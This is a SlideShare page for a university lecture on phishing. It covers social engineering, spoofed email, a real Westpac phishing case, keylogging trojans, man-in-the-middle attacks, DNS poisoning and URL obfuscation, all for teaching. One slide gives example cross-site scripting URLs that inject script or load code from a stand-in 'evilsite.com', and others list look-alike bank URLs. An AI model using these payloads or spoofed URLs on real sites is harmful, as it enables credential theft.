PhishingPhishing
1Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh
About me
 Currently, Lecturer in this department for
351 days 
 Former Research Intern in M3C Laboratory,
University of...
For you
 Email me at rushdecoder@yahoo.com if
you want
 My homepage and course materials are at
http://rushdishams.googl...
Phishing
 The number of unique e-mail-based fraud
attacks detected in November 2005 was
16,882, almost double the 8,975 a...
Phishing
 The number of brands targeted increased
by nearly 50 percent over the course of
2005, from 64 percent to 93 per...
Phishing
 Top brands continue to be hijacked, with
phishers using established names to try to lure
people to their sites
...
Phishing
 There's no point in using local names if the
attack is global
 Attacks are becoming increasingly
sophisticated...
Phishing
 Twenty-five percent of those sites now host
keylogging code
 If you visit one you will probably open yourself
...
Exploiting the Weakness
 Why is it that Crooks are able to mount an
attack?
 What are the weaknesses that they exploit?
...
Exploiting the Weakness
 Expanding market in exploits
Very few people requires as the technical
gadgets are impressive a...
Social Engineering Factors
 Phishing attacks rely upon a mix of technical
deceit and social engineering practices.
 In t...
Social Engineering Factors
 Communication channels such as email,
web-pages, IRC and instant messaging
services are popul...
Social Engineering Factors
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 13
Phishing Techniques
 Phishing attacks initiated by email are the
most common.
 Using Trojan Network, Phishers can delive...
Phishing Techniques
 Utilising well known flaws in the common
mail server communication protocol
(SMTP), Phishers are abl...
Phishing Techniques
 Official looking and sounding emails
 Copies of legitimate corporate emails with
minor URL changes
...
Phishing Techniques
 A plethora of anti spam-detection inclusions
 Crafting of “personalised” or unique email
messages
...
A real-life phishing example
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 18
Things to note
 The email was sent in HTML format
 Lower-case L’s have been replaced with
upper-case I’s. This is used t...
Things to note
 Within the HTML-based email, the URL link
https://oIb.westpac.com.au/ib/defauIt.asp in fact
points to a e...
Things to note
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 21
Things to note
 The non-standard HTTP port of 4903 can be
attributed to the fact that the Phishers fake
site was hosted o...
Things to note
 Recipients that clicked on the link were
then forwarded to the real Westpac
application.
 However a Java...
Things to note
 This fake login window was designed to capture and
store the recipient’s authentication credentials
 Jav...
Where are they standing now?
 The inclusion of HTML disguised links
 The use of third-party supplied, or fake,
banner ad...
Where are they standing now?
 Embedding malicious content within the
viewable web-page
 installs software of the Phisher...
Banner Advertising
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 27
IRC and IM
 New on the Phishers radar, IRC and Instant
Messaging (IM) forums are likely to become
a popular phishing grou...
Trojan Hosts
 the delivery source is increasingly becoming
home PC’s that have been previously
compromised.
 Trojan hors...
Trojan Hosts
 the installation of Trojan horse software is
on the increase, despite the efforts of large
anti-virus compa...
Information Specific Trojans
 You have come across a file named
JavaUtil.zip.
 But you forgot that you have “do not show...
Information Specific Trojans
 Early in 2004, a Phisher created a custom key-logger
Trojan.
 The Trojan key-logger was de...
Phishing Attack Vectors
 Man-in-the-middle Attacks
 URL Obfuscation Attacks
 Cross-site Scripting Attacks
 Preset Sess...
Man in the Middle Attacks
 the attacker situates themselves between
the customer and the real web-based
application, and ...
Man in the Middle Attacks
 The attackers server then proxies all
communications between the customer and
the real web-bas...
Man in the Middle Attacks
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 36
Man in the Middle Attacks
 The attacker must be able to direct the
customer to their proxy server instead of
the real ser...
Transparent Proxies
 Situated on the same network segment or
located on route to the real server
 a transparent proxy se...
DNS Cache Poisoning
 be used to disrupt normal traffic routing by
injecting false IP addresses for key domain
names.
 th...
URL Obfuscation
 the attacker tricks the customer into connecting to
their proxy server instead of the real server.
 the...
Third party shortened URL
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 41
Cross Site Scripting (XSS)
 make use of custom URL or code injection
into a valid web-based application URL
 the result ...
Cross Site Scripting (XSS)
 Full HTML substitution such as:
http://mybank.com/ebanking?URL=http://evilsite.com/phishing/f...
Cross Site Scripting (XSS)
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 44
Preset Session Attack
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 45
Hidden Frame
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 46
Graphical Substitution
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 47
References
 The Phishing Guide by Next Generation
Security Software Software Limited.
Rushdi Shams, Lecturer, Dept of CSE...
Related Papers
 Technical Trends in Phishing Attacks by
Jason Milletary
 Why Phishing Works by Dhamija et al.
Rushdi Sha...
Upcoming SlideShare
Loading in...5
×

L1 phishing

387

Published on

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
387
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
30
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

L1 phishing

  1. 1. PhishingPhishing 1Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh
  2. 2. About me  Currently, Lecturer in this department for 351 days   Former Research Intern in M3C Laboratory, University of Bolton, UK Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 2
  3. 3. For you  Email me at rushdecoder@yahoo.com if you want  My homepage and course materials are at http://rushdishams.googlepages.com  You need to join http://groups.google.com/group/csebatche sofrushdi Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 3
  4. 4. Phishing  The number of unique e-mail-based fraud attacks detected in November 2005 was 16,882, almost double the 8,975 attacks launched in November 2004, said the report (Anti-Phishing Working Group)  Phishing e-mails pretend to come from legitimate companies, such as banks and e- commerce sites  Used by criminals to try and trick Web users into revealing personal information and account detailsRushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 4
  5. 5. Phishing  The number of brands targeted increased by nearly 50 percent over the course of 2005, from 64 percent to 93 percent in November 2006  "One big attack will temporarily hurt a brand, but the increase in e-commerce is not slowing down," (Mark Murtagh, Websense technical director) Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 5
  6. 6. Phishing  Top brands continue to be hijacked, with phishers using established names to try to lure people to their sites  eBay is often spoofed, for obvious reasons  Google is increasingly being targeted because of its expansion into different business application models.  The big banking names are used too--HSBC, Citigroup, Lloyds--all the major brands Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 6
  7. 7. Phishing  There's no point in using local names if the attack is global  Attacks are becoming increasingly sophisticated  Web sites are hosting keylogging malicious software  Before, people had to click on a site to download malicious code.  If they thought a web site 'phishy,' they could leave and probably not be harmed.  Now. with most phishing sites they just have to Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 7
  8. 8. Phishing  Twenty-five percent of those sites now host keylogging code  If you visit one you will probably open yourself to identity theft or fraud Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 8
  9. 9. Exploiting the Weakness  Why is it that Crooks are able to mount an attack?  What are the weaknesses that they exploit?  Richness of functionality Complex systems can have program bugs  Increasing interconnectivity Separate functions of any system are combined and interconnected via Internet Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 9
  10. 10. Exploiting the Weakness  Expanding market in exploits Very few people requires as the technical gadgets are impressive and cheap  The scale of content based attacks Everyone uses e-mails and e-mails are exploitable. Then why not? Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 10
  11. 11. Social Engineering Factors  Phishing attacks rely upon a mix of technical deceit and social engineering practices.  In the majority of cases the Phisher must persuade the victim  The victim intentionally performs a series of actions that will provide access to confidential information Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 11
  12. 12. Social Engineering Factors  Communication channels such as email, web-pages, IRC and instant messaging services are popular.  Phisher must impersonate a trusted source (e.g. the helpdesk of their bank, automated support response from their favourite online retailer, etc.) for the victim to believe. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 12
  13. 13. Social Engineering Factors Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 13
  14. 14. Phishing Techniques  Phishing attacks initiated by email are the most common.  Using Trojan Network, Phishers can deliver specially crafted emails to millions of legitimate “live” email addresses within a few hours  Sometimes phishers purchase e-mail address Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 14
  15. 15. Phishing Techniques  Utilising well known flaws in the common mail server communication protocol (SMTP), Phishers are able to create emails with fake “Mail From:” headers and impersonate any organisation they choose.  Any customer replies to the phishing email will be sent to them. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 15
  16. 16. Phishing Techniques  Official looking and sounding emails  Copies of legitimate corporate emails with minor URL changes  HTML based email used to obfuscate target URL information  Standard virus/worm attachments to emails Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 16
  17. 17. Phishing Techniques  A plethora of anti spam-detection inclusions  Crafting of “personalised” or unique email messages  Fake postings to popular message boards and mailing lists  Use of fake “Mail From:” addresses and open mail relays for disguising the source of the email Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 17
  18. 18. A real-life phishing example Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 18
  19. 19. Things to note  The email was sent in HTML format  Lower-case L’s have been replaced with upper-case I’s. This is used to help bypass many standard anti-spam filters Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 19
  20. 20. Things to note  Within the HTML-based email, the URL link https://oIb.westpac.com.au/ib/defauIt.asp in fact points to a escape-encoded version of the following URL: http://olb.westpac.com.au.userdll.com:4903/ib/index. htm Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 20
  21. 21. Things to note Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 21
  22. 22. Things to note  The non-standard HTTP port of 4903 can be attributed to the fact that the Phishers fake site was hosted on a third-party PC that had been previously compromised by an attacker Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 22
  23. 23. Things to note  Recipients that clicked on the link were then forwarded to the real Westpac application.  However a JavaScript popup window containing a fake login page was presentedRushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 23
  24. 24. Things to note  This fake login window was designed to capture and store the recipient’s authentication credentials  JavaScript also submitted the authentication information to the real Westpac application Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 24
  25. 25. Where are they standing now?  The inclusion of HTML disguised links  The use of third-party supplied, or fake, banner advertising graphics to lure customers  The use of web-bugs (hidden items within the page – such as a zero-sized graphic) to track a potential customer  The use of pop-up or frameless windows to disguise the true source of the Phishers message. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 25
  26. 26. Where are they standing now?  Embedding malicious content within the viewable web-page  installs software of the Phishers choice (e.g. key-loggers, screen-grabbers, back-doors and other Trojan horse programs). Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 26
  27. 27. Banner Advertising Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 27
  28. 28. IRC and IM  New on the Phishers radar, IRC and Instant Messaging (IM) forums are likely to become a popular phishing ground.  The common usage of Bots (automated programs that listen and participate in group discussions) in many of the popular channels, Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 28
  29. 29. Trojan Hosts  the delivery source is increasingly becoming home PC’s that have been previously compromised.  Trojan horse program has been installed which allows Phishers (along with Spammers, Warez Pirates, DDoS Bots, etc.) to use the PC as a message propagator.  tracking back a Phishing attack to an individual initiating criminal is extremely difficult. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 29
  30. 30. Trojan Hosts  the installation of Trojan horse software is on the increase, despite the efforts of large anti-virus companies.  operate large networks of Trojan deployments (networks consisting of thousands of hosts are not uncommon)  Phishers must be selective about the information they wish to record or be faced with information overload. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 30
  31. 31. Information Specific Trojans  You have come across a file named JavaUtil.zip.  But you forgot that you have “do not show known file extensions” in your Windows setting.  Hmm, then JavaUtil.zip originally maybe a .exe file whose full name is JavaUtil.zip.exe  You, unfortunately, click that zip file to unzip it.  You are doomed!  Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 31
  32. 32. Information Specific Trojans  Early in 2004, a Phisher created a custom key-logger Trojan.  The Trojan key-logger was designed specifically to capture all key presses within windows with the titles of various names including:- commbank, Commonwealth, NetBank, Citibank, Bank of America, e-gold, e-bullion, e-Bullion, evocash, EVOCash, EVOcash, intgold, INTGold, paypal, PayPal, bankwest, Bank West, BankWest, National Internet Banking, cibc, CIBC, scotiabank and ScotiaBank Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 32
  33. 33. Phishing Attack Vectors  Man-in-the-middle Attacks  URL Obfuscation Attacks  Cross-site Scripting Attacks  Preset Session Attacks Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 33
  34. 34. Man in the Middle Attacks  the attacker situates themselves between the customer and the real web-based application, and proxies all communications between the systems.  This form of attack is successful for both HTTP and HTTPS communications.  The customer connects to the attackers server as if it was the real site  The attackers server makes a simultaneous connection to the real site. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 34
  35. 35. Man in the Middle Attacks  The attackers server then proxies all communications between the customer and the real web-based application server  In the case of secure HTTPS communications, an SSL connection is established between the customer and the attackers proxy  while the attackers proxy creates its own SSL connection between itself and the real server. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 35
  36. 36. Man in the Middle Attacks Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 36
  37. 37. Man in the Middle Attacks  The attacker must be able to direct the customer to their proxy server instead of the real server.  This may be carried out through a number of methods:  Transparent Proxies  DNS Cache Poisoning  URL Obfuscation Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 37
  38. 38. Transparent Proxies  Situated on the same network segment or located on route to the real server  a transparent proxy service can intercept all data by forcing all outbound HTTP and HTTPS traffic through itself. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 38
  39. 39. DNS Cache Poisoning  be used to disrupt normal traffic routing by injecting false IP addresses for key domain names.  the attacker poisons the DNS cache of a network firewall so that all traffic destined for the MyBank IP address now resolves to the attackers proxy server IP address Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 39
  40. 40. URL Obfuscation  the attacker tricks the customer into connecting to their proxy server instead of the real server.  the customer may follow a link to http://privatebanking.mybank.com.ch http://mybank.privatebanking.com http://privatebanking.mybonk.com http://privatebanking.mybánk.com http://privatebanking.mybank.hackproof.com  And the real one is http://privatebanking.mybank.com Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 40
  41. 41. Third party shortened URL Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 41
  42. 42. Cross Site Scripting (XSS)  make use of custom URL or code injection into a valid web-based application URL  the result of poor web-application development processes. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 42
  43. 43. Cross Site Scripting (XSS)  Full HTML substitution such as: http://mybank.com/ebanking?URL=http://evilsite.com/phishing/fakepage.htm  Inline embedding of scripting content, such as: http://mybank.com/ebanking?page=1&client=<SCRIPT>evilcode  Forcing the page to load external scripting code, such as: http://mybank.com/ebanking?page=1&response=evilsite.com%21evilcode.js&go=2 Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 43
  44. 44. Cross Site Scripting (XSS) Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 44
  45. 45. Preset Session Attack Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 45
  46. 46. Hidden Frame Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 46
  47. 47. Graphical Substitution Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 47
  48. 48. References  The Phishing Guide by Next Generation Security Software Software Limited. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 48
  49. 49. Related Papers  Technical Trends in Phishing Attacks by Jason Milletary  Why Phishing Works by Dhamija et al. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 49
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×